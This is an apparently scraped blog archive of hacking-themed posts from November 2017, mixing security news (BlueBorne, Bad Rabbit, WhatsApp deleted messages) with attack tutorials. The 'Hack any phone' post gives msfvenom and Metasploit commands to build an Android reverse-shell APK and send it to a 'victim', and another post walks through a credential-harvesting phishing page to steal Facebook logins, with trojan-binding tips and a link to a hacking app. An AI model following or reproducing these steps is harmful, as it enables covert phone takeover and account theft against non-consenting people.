Posts

Showing posts from November, 2017

Bluetooth hack affects 20 million amazon echo and Google Home devices

Image
#&# computer experts  Remember BlueBorne? A series of recently disclosed critical Bluetooth flaws that affect billions of Android, iOS, Windows and Linux devices have now been discovered in millions of AI-based voice-activated personal assistants, including  Google Home  and  Amazon Echo . As estimated during the discovery of this devastating threat, several IoT and smart devices whose operating systems are often updated less frequently than smartphones and desktops are also vulnerable to BlueBorne. BlueBorne is the name given to the sophisticated attack exploiting a total of eight Bluetooth implementation vulnerabilities that allow attackers within the range of the targeted devices to run malicious code, steal sensitive information, take complete control, and launch man-in-the-middle attacks.  What's worse?  Triggering the BlueBorne exploit doesn't require victims to click any link or open any file—all without requiring user interaction. Also, most security produ

Facebook, Update your status with different styles

Update your status with different styles  You can give the next style to the font in Facebook status, comments and chat. For this, visit the website below - http://app.live-start.com/magic-status/ http://namefunk.com/ Type the text in the dialog box and select its style. Now copy and paste it into Facebook and you will see it in different style.

send whatsapp messages can be deleted, but they don't really go away

Image
Encrypted messaging platform WhatsApp recently added the ability to delete sent messages, but the team at Android Jefe (article is in Spanish) has discovered that they don't quite disappear completely. A deleted text still exists on the recipient's device in the form of a notification, Android Jefe found, and with the proper software it can be read hours later. As an individual bug it might not sound too concerning, but the Android notification log doesn't exist in a vacuum. If an Android device has already been compromised by malware, the notification log could be a way for anyone to read WhatsApp messages, deleted or not, and that's a huge security problem for an app that prides itself on being private and secure. Android notifications and you Every time a notification comes to an Android device it gets stored in a log that records everything from that Android session (it clears on reboot). If you can access the notification log you can see a list of every

Hack any phone (STEPS by STEPS)

Image
STEPS: 1. Fire up and open command terminal. 2. Set payload and create custom windows executable Command: root @ kali: - # msfvenom -p android / meterpreter / reverse_tcp LHOST = 192.168.0.110 LPORT = 4444 R> andro.apk (To know your LHOST, open new terminal and type ifconfig) your The apk file is saved in the home folder Note: Do not add any stray space characters anywhere as the command as is (after changing the LHOST and LPORT as needed). 3. Transfer / mail this file (here andro.apk) file to the victim's phone and install it. 4. Start the metasploit framework console as follows: Command:            root @ kali: - # msfconsole 5. Now it's time to open and setup multi-handler Follows the steps: msf>  use multi / handler msf exploit (handler)>  set payload android / meterpreter / reverse_tcp msf exploit (handler)>  set LHOST 192.168.0.110 msf exploit (handler)>  set LPORT 4444 msf exploit (handler)>  exploit          Payload han

Facebook hacking practical video

Facebook hacking practical video  Best tips to hack a facebook account on your smartphone see the video  Like to my facebook page ๐Ÿ—ฃ Facebook page My applications to learn hacking ๐Ÿ—ฃ App download

An intoroduction to trojan

Image
Most of you heard about the Trojans in History. Or I am pretty sure that you all have watched the movie "Troy" where Brad pitt is acting as "Achilles". Like in the movie, a trojan is something that looks like a safe bet, but once entered, they will be attached to the host system and starts to pull the plugs of your computer without your knowledge. The behaviour of trojans will be normally daemon. No one will knew it is there, but you will lose your valuable data without your knowledge. There are a variety of ways a trojan horse can look like.   1) It can be some malicious instructions that are hided inside legitimate programs and can perform actions that are unknown and are unwanted by the user. 2) A legit programs source has been altered by binding a Trojan to it. We can read the legits program as byte and then can append the trojans bytes after it. So with the help of a stub, one can easily execute this file. Once executed, the user will see the legit pro

How to hack a facebook??

WHAT IS CREDENTIALS HARVESTER ATTACK ? It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker. STEPS: 1. Boot up kali linux on your machine and open terminal.   2. Type this command in the kali linux terminal.                                          root@kali~#  setoolkit   3. Enter 'y' to agree the social engineering toolkit terms and conditions.   4. Select the following options one by one from the menu                   '1' (Social Engineering Attacks) then                   '2'(Website Attack Vectors) then                 '3'(Credential Harvester Attack)

What is hacking?

Image
In computer networking, hacking is any technical effort to manipulate the normal behavior of network connections and connected systems. A hacker is any person engaged in hacking. The term "hacking" historically referred to constructive, clever technical work that was not necessarily related to computer systems. Today, however, hacking and hackers are most commonly associated with malicious programming attacks on the Internet and other networks. Origins of Hacking M.I.T. engineers in the 1950s and 1960s first popularized the term and concept of hacking. Starting at the model train club and later in the mainframe computer rooms, the so-called "hacks" perpetrated by these hackers were intended to be harmless technical experiments and fun learning activities. Later, outside of M.I.T., others began applying the term to less honorable pursuits. Before the Internet became popular, for example, several hackers in the U.S. experimented with methods to modify tele

Trump organization hacked 4 year ago-and the company never noticed

Image
Four years ago, the Trump Organization experienced a major cyber breach that could have allowed the perpetrator (or perpetrators) to mount malware attacks from the company’s web domains and may have enabled the intruders to gain access to the company’s computer network. Up until this week, this penetration had gone undetected by President Donald Trump’s company, according to several internet security researchers. In 2013, a hacker (or hackers) apparently obtained access to the Trump Organization’s domain registration account and created at least 250 website subdomains that cybersecurity experts refer to as “shadow” subdomains. Each one of these shadow Trump subdomains pointed to a Russian IP address, meaning that they were hosted at these Russian addresses.(Every website domain is associated with one or more IP addresses. These addresses allow the internet to find the server that hosts the website. Authentic Trump Organization domains point to IP addresses that are hosted in the

How to make a app??????

Image
Do you want to earn money by making a good app? I have a website for this. On which you can make a good app by working for a month or two. But you will have to learn one or two weeks in this application. This is the name of the website. Thunkable.com

If you type 1+2+3 into your iPhone's calculator on iOS 11, your probably won't get 6๐Ÿ™‚

Image
If you’ve upgraded your iPhone’s operating system to iOS 11, try this: Go to the calculator app and quickly type 1+2+3. You likely won’t get 6. You might get 23, or 24, or 16, or 32, or something else, depending on what buttons you tap and in what order, and, obviously, none of which is the right answer. According to a group of eagle-eyed iPhone users on Reddit who spotted the issue, it seems to be because of a new animation in the calculator app, where a button briefly fades to white when you press it. The result is that if you press an operator button (i.e., the plus sign) before the short animation finishes, the app ignores it. So, 1 + 2 + 3 accidentally gets read as 1 + 23. It’s not entirely clear why Apple would design its calculator like this, and whether the bug will be fixed. Apple wasn’t immediately available to comment, but it seems like another example of the company no longer sweating the details in its designs. For now, we should probably all be more patient in

Hack facebook

Image
Facebook hacking app link I  will show number of ways to  Hack Facebook Account  that all hackers usually use to  hack Facebook Account . So beware from hackers and protect your facebook account from hackers. Our site provides only security tips to protect your facebook account from hackers . We sharing only these methods because if you know how to hack you must know how to secure. Must read carefully all these methods, beware from all attacks, and protect your facebook account from hackers. Note :-  This post is only for security purpose don't try any illigal activity and i'm just shared these methods because protect our facebook account from these types of hacking attacks. Top Ways How Hackers Can Hack Facebook Accounts In 2016 Mostly Hackers use these methods to  hack facebook account 2016 , So protect yourself from hackers. Must Read this post, and beware from hackers #1 Hack Facebook Account Password By Phishing Phishing is still the most popular attack vec

Bad rabbit - ransomvar paralyzes train stations, airport and media in Russia and europe

Image
An advanced cyberattack has hit media outlets and infrastructure in Russia, Ukraine and Eastern Europe, causing mass disruption Cybersecurity researchers from Kaspersky described the malware, dubbed Bad Rabbit, in a blogpost on Tuesday, October 24. They explained how the previously unknown malware takes control of computer systems and encrypts data so that people can’t access it. A ransom is then demanded in order to unlock the computers. Security researchers are comparing the Bad Rabbit ransomware to WannaCry, which disabled 300,000 computers earlier this year. “Currently, it’s unclear as to whether or Bad Rabbit will be able to reap the same damage as WannaCry, but undoubtedly businesses will be holding their breath,” Jamie Graves, CEO of security firm ZoneFox, said in an email to  Newsweek . “This highlights the need for a robust security posture, based on both technology and education.” Victims of the Bad Rabbit ransomware include the Kiev Metro and Odessa International